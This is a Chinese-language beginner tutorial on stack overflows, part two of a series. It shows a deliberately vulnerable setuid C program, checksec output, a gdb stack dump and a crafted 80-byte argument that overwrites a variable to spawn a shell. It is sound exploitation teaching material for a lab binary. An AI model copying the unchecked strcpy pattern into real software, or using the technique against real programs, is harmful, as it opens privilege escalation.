栈溢出入门系列入门教程二
overflow2.c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include "dump_stack.h"
void vuln(int win, char *str) {
char buf[64];
strcpy(buf, str);
dump_stack((void **) buf, 23, (void **) &win);
printf("win = %d\n", win);
if (win == 1) {
execl("/bin/sh", "sh", NULL);
} else {
printf("Sorry, you lose.\n");
}
exit(0);
}
int main(int argc, char **argv) {
if (argc != 2) {
printf("Usage: stack_overwrite [str]\n");
return 1;
}
uid_t euid = geteuid();
setresuid(euid, euid, euid);
vuln(0, argv[1]);
return 0;
}
dump_stack:打印当前cpu的堆栈.
gdb-peda$ checksec
CANARY : disabled
FORTIFY : disabled
NX : disabled
PIE : disabled
RELRO : Partial
由此可见,该程序相当脆弱.只要我们溢出数据,使win为1即可.
两种方法:
方法一:
gdb --args ./overflow2 $(python -c "print 'A'*64+'B'*4")
gdb调试,由于源代码中有if,于是我们进入vuln函数,找到了if对应的汇编代码,如下:
0x8048666 <vuln+62>: mov DWORD PTR [esp],eax
0x8048669 <vuln+65>: call 0x80483f0 <printf@plt>
0x804866e <vuln+70>: mov eax,DWORD PTR [ebp+0x8]
**0x8048671 <vuln+73>: cmp eax,0x1**
0x8048674 <vuln+76>: jne 0x8048694 <vuln+108>
0x8048676 <vuln+78>: mov DWORD PTR [esp+0x8],0x0
可见这次是拿地址为ebp+0x8的内容与1相比较.同本系列第一篇一样,在cmp出下断点,查看栈中的内容.
gdb-peda$ x/90x 0xffffce20
0xffffce20: 0x410x410x410x410x410x410x410x41
0xffffce28: 0x410x410x410x410x410x410x410x41
0xffffce30: 0x410x410x410x410x410x410x410x41
0xffffce38: 0x410x410x410x410x410x410x410x41
0xffffce40: 0x410x410x410x410x410x410x410x41
0xffffce48: 0x410x410x410x410x410x410x410x41
0xffffce50: 0x410x410x410x410x410x410x410x41
0xffffce58: 0x410x410x410x410x410x410x410x41
0xffffce60: 0x420x420x420x420x000xf10xea0xf7
0xffffce68: 0x980xce0xff0xff0x0b0x870x040x08
0xffffce70: 0x000x000x000x000x650xd10xff0xff
0xffffce78: 0xe80x03
对应截图:
ebp+0x8=0xffffce70,0xffffce70与char数组相差0x50(0xffffce70-0xffffce20).于是乎构造出
./overflow2 $(python -c "print 'A'*80+'\x01\x00\x00\x00'")
结果图:
其实前本系列前两篇文章思路差不多.
方法二:思路就是写一个自动化脚本,来循环判断是否溢出成功.实现还是有点困难,以后再写.
注:由于操作系统的原因,一些地址可能会有不同,在此一定要以你的电脑上的地址为准.附带相关文件地址:文件地址.欢迎评论!!!